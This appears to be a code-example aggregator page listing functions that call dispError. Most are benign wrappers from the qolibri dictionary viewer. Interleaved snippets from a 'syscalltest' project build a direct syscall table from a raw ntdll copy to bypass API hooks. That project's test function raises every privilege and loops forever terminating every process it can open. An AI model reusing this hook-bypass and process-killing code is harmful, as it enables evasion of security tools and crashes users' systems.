コード例 #1
0
ファイル: main.c プロジェクト: noscripter/syscalltest 
void mymain(void){
	NTSTATUS status = STATUS_PENDING;

	///The requested operation waits until you click a button.
	dispError(status);
	selfUnmap();
	///No image (except the own one) can be found...
	dispError(STATUS_SECTION_NOT_IMAGE);

	///Initialize everything...
	status = initializeSyscallTable();
	if (status) {
		dispError(status);
		return;
	}

	///...and demonstrate that we have hopefully succeeded.
	status = testNtapiTable();
	if (status)
		dispError(status);
}
コード例 #2
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
QList <EB_Font_Code> QEb::fontList()
{
    QList <EB_Font_Code> flist;
    EB_Font_Code fonts[EB_MAX_FONTS];
    int cnt;
    EB_Error_Code ecode = eb_font_list(&book, fonts, &cnt);
    if (ecode != EB_SUCCESS)
        dispError("eb_font_list", ecode);
    else
        for (int i = 0; i < cnt; i++)
            flist << fonts[i];
    return flist;
}
コード例 #3
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
QList <EB_Hit> QEb::hitList(int max_count)
{
    EB_Hit *harray = new EB_Hit[max_count];
    int cnt;
    QList <EB_Hit> hits;
    EB_Error_Code ecode = eb_hit_list(&book, max_count, harray, &cnt);
    if (ecode != EB_SUCCESS)
        dispError("eb_hit_list", ecode);
    else
        for (int i = 0; i < cnt; i++) 
            hits << harray[i];
    return hits;
}
コード例 #4
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
EB_Error_Code QEb::searchCross(const QStringList &words)
{
    QList <QByteArray> blist = toEucList(words);
    char** wlist = new char*[words.count()+1];
    for (int i = 0; i < blist.count(); i++)
        wlist[i] = blist[i].data();
    wlist[words.count()] = NULL;
    EB_Error_Code ecode = eb_search_cross(&book, wlist);
    if (ecode != EB_SUCCESS)
        dispError("eb_search_cross", ecode);
    delete[] wlist;
    return ecode;
}
コード例 #5
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
QString QEb::multiTitle(EB_Multi_Search_Code mid)
{
    char s[EB_MAX_MULTI_TITLE_LENGTH+1];
    EB_Error_Code ecode = eb_multi_title(&book, mid, s);
    if (ecode != EB_SUCCESS) {
        dispError("eb_multi_title", ecode);
        return QString();
    }
    if (characterCode() == EB_CHARCODE_ISO8859_1)
        return QString::fromLatin1(s);
    else
        return eucToUtf(s);
}
コード例 #6
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
QString QEb::wideAltCharacterText(int c_num)
{
    char alt[EB_MAX_ALTERNATION_TEXT_LENGTH+1];
    EB_Error_Code ecode = eb_wide_alt_character_text(&appendix, c_num, alt);
    if (ecode != EB_SUCCESS) {
        dispError("eb_wide_alt_character_text", ecode);
        return QString();
    }
    if (characterCode() == EB_CHARCODE_ISO8859_1)
        return QString::fromLatin1(alt);
    else
        return eucToUtf(alt);
}
コード例 #7
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
EB_Error_Code QEb::stopCode(int *stop1, int *stop2)
{
    int stop_code[2];
    EB_Error_Code ecode = eb_stop_code(&appendix, stop_code);
    if (ecode != EB_SUCCESS) {
        dispError("eb_stop_code", ecode);
        *stop1 = *stop2 = -1;
    } else {
        *stop1 = stop_code[0];
        *stop2 = stop_code[1];
    }
    return ecode;
}
コード例 #8
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
// Initialize Subbook
QList <EB_Subbook_Code> QEb::subbookList()
{
    EB_Subbook_Code codes[EB_MAX_SUBBOOKS];
    int cnt;

    QList <EB_Subbook_Code> list;
    EB_Error_Code ecode = eb_subbook_list(&book, codes, &cnt);
    if (ecode != EB_SUCCESS)
        dispError("eb_subbook_list", ecode);
    else
        for(int i = 0; i < cnt; i++)
            list << codes[i];
    return list;
}
コード例 #9
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
QString QEb::multiEntryLabel(EB_Multi_Search_Code mid, int entry)
{
    char s[EB_MAX_MULTI_LABEL_LENGTH+1];
    EB_Error_Code ecode = eb_multi_entry_label(&book, mid, entry, s);
    if (ecode != EB_SUCCESS) {
        dispError("eb_multi_entry_label", ecode);
        return QString();
    }
    if (characterCode() == EB_CHARCODE_ISO8859_1)
        return QString::fromLatin1(s);
    else
        return eucToUtf(s);
    
}
コード例 #10
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
QList <EB_Multi_Search_Code> QEb::multiSearchList()
{
    EB_Multi_Search_Code codes[EB_MAX_MULTI_SEARCHES];
    int cnt;
    QList <EB_Multi_Search_Code> list;

    EB_Error_Code ecode = eb_multi_search_list(&book, codes,  &cnt);
    if (ecode != EB_SUCCESS)
        dispError("eb_multi_search_list", ecode);
    else
        for (int i = 0; i < cnt; i++)
            list << codes[i];
    return list;
}
コード例 #11
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
QByteArray QEb::readBinary()
{
    char buff[1024];
    ssize_t len;
    QByteArray b;
    for(;;) {
        EB_Error_Code ecode = eb_read_binary(&book, 1024, buff, &len);
        if (ecode != EB_SUCCESS) {
            dispError("eb_", ecode);
            return b;
        }
        if (len > 0 )
            b += QByteArray(buff, (int)len);
        if (len < 1024)
            break;
    }
    return b;
}
コード例 #12
0
ファイル: main.c プロジェクト: noscripter/syscalltest 
///Attempts to read the ntdll.dll file and then tries to dump the NtXxx functions
NTSTATUS initializeSyscallTable(void) {
	PVOID pNtdll = sg_pRawNtdll;
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	ULONG dbgBuf = 0x0;
	ULONG firstOccurence = 0x0;

	///Set up ourselves...
	status = performCoreInitialization(pNtdll, NTDLL_MAX_SIZE, &dbgBuf, &firstOccurence);
	if (status) {
		if (firstOccurence)
			dispError((NTSTATUS)dbgBuf);

		return status;
	}

	///Now create the syscall table in order to be able to use all NtXxx functions.
	return createNtapiLookupTable(pNtdll);
}
コード例 #13
0
ファイル: qeb.cpp プロジェクト: fujii/qolibri 
QByteArray QEb::wideBitmapToGif(const QByteArray &bitmap)
{
    QSize sz = wideFontQSize();
    QByteArray b;
    if (sz.width() == 0) 
        return b;

    int image_size= wideFontGifSize(font());
    char *buff = new char[image_size];
    size_t size;
    EB_Error_Code ecode = eb_bitmap_to_gif(bitmap, sz.width(), sz.height(),
                                           buff, &size);
    if (ecode != EB_SUCCESS)
        dispError("eb_bitmap_to_gif", ecode);
    else
        b = QByteArray(buff, (int)size);
    delete[] buff;
    return b;
}
コード例 #14
0
ファイル: main.c プロジェクト: noscripter/syscalltest 
///If everything has been set up sucessfully, we do just a small test
///which terminates all programs it can get PROCESS_FULL_ACCESS to.
///Furthermore, it maps ntoskrnl.exe as an executable image.. even if that's not too useful at the moment...
NTSTATUS testNtapiTable(void) {
	UNICODE_STRING uMyNtdll;
	PIO_STATUS_BLOCK ioSb;
	OBJECT_ATTRIBUTES objAttr;
	CLIENT_ID cid;
	OBJECT_ATTRIBUTES procAttr;
	LARGE_INTEGER interval;

	PVOID pNtosBase = NULL;
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	SIZE_T viewSize = 0;
	HANDLE hFile = INVALID_HANDLE_VALUE;
	HANDLE hCurrPid = NtCurrentTeb()->ClientId.UniqueProcess;
	WCHAR szMyNtdll[] = L"\\systemroot\\system32\\ntoskrnl.exe";
	HANDLE hSection = INVALID_HANDLE_VALUE;
	HANDLE hProcess = INVALID_HANDLE_VALUE;

	///The copy of the pristine ntdll data has succeeded and can now be found in the syscall table.
	///Of course, we display this message by just using this table...
	syscallStub(ntapiLookup("NtRaiseHardError", sizeof("NtRaiseHardError")), STATUS_FT_READ_FROM_COPY, 0, 0, NULL, 0, (PULONG)&status);

	uMyNtdll.Buffer = szMyNtdll;
	uMyNtdll.LengthInBytes = sizeof(szMyNtdll) - sizeof(UNICODE_NULL);
	uMyNtdll.MaximumLengthInBytes = sizeof(szMyNtdll);
	InitializeObjectAttributes(&objAttr, &uMyNtdll, OBJ_CASE_INSENSITIVE, NULL, NULL);
	status = syscallStub(ntapiLookup("NtOpenFile", sizeof("NtOpenFile")), &hFile, GENERIC_READ | SYNCHRONIZE, &objAttr, &ioSb, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);
	if (status)
		return status;

	status = syscallStub(ntapiLookup("NtCreateSection", sizeof("NtCreateSection")), &hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hFile);
	if (status)
		return status;

	status = syscallStub(ntapiLookup("NtMapViewOfSection", sizeof("NtMapViewOfSection")), hSection, INVALID_HANDLE_VALUE, &pNtosBase, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_READONLY);
	if (status)
		return status;

	///Clearly, the ntoskrnl.exe image could not be loaded at its kernel 0xFFFFXXXXXXXXXXXXXX base...
	dispError(STATUS_IMAGE_NOT_AT_BASE);

	cid.UniqueThread = NULL;
	interval.QuadPart = -2000000;
	InitializeObjectAttributes(&procAttr, NULL, 0, NULL, NULL);

	///Will kill Windows 7.
	for (ULONG i = 0; i < 0x28; i++)
		status = myRtlAdjustPrivileges(i);

	for (;;) {
		for (ULONG_PTR i = 0; i < 0x8000; i += 4) {
			if (hCurrPid != (HANDLE)i) {
				cid.UniqueProcess = (HANDLE)i;
				status = syscallStub(ntapiLookup("NtOpenProcess", sizeof("NtOpenProcess")), &hProcess, PROCESS_ALL_ACCESS, &procAttr, &cid);
				if (!status) {
					syscallStub(ntapiLookup("NtDelayExecution", sizeof("NtDelayExecution")), FALSE, &interval);
					syscallStub(ntapiLookup("NtTerminateProcess", sizeof("NtTerminateProcess")), hProcess, STATUS_FATAL_APP_EXIT);
				}
			}
		}
	}
}